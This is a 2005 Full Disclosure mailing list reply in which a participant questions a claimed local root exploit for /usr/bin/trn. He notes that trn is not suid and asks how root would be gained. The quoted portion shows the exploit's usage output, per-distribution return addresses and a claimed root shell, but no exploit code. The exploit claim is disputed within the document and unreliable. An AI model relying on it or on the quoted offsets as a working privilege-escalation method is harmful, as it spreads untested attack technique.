Full Disclosure mailing list archives
Re: /usr/bin/trn local root exploit
From: Frank Thyes <thyes () gmx net>
Date: Wed, 26 Jan 2005 13:41:11 +0100
+++ Z z a g o r R [Wed, Jan 26, 2005 at 09:27:28AM CET]:
/* /usr/bin/trn local root exploit By ZzagorR - http://www.rootbinbash.com */
/*
sh-2.05b$ ./trn
usage : ./trn ret buf
example : ./trn 0xbfffff64
[+] mandrake 9.2 = 0xbfffff96
[+] slackware 10.0.0= 0xbfffff98
[+] slackware 9.1.0= 0xbfffff84
sh-2.05b$
sh-2.05b$ ./trn 0xbfffff84 128
[BOO %] 128
[RET %] bfffff84
sh-2.05b#
sh-2.05b# id
uid=0(root) gid=98(nobody) groups=98(nobody)
I didn't understand how you will get root? Afaik trn isn't suid. I didn't have Mandrake or another Linux here so I can't test it. Please explain.

Regards
Frank
--
In the beginning was the word and the word was content-type: text/plain
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)
- Re: Re: /usr/bin/trn local root exploit Honza Vlach (Jan 26)
- Re: /usr/bin/trn local root exploit Z z a g o r R (Jan 26)
- Re: /usr/bin/trn local root exploit Frank Thyes (Jan 26)
- <Possible follow-ups>
- Re: /usr/bin/trn local root exploit ntx0f (Jan 27)
- Re: /usr/bin/trn local root exploit Wojciech Pawlikowski (Jan 27)
- Re: /usr/bin/trn local root exploit msh at datakill (Jan 26)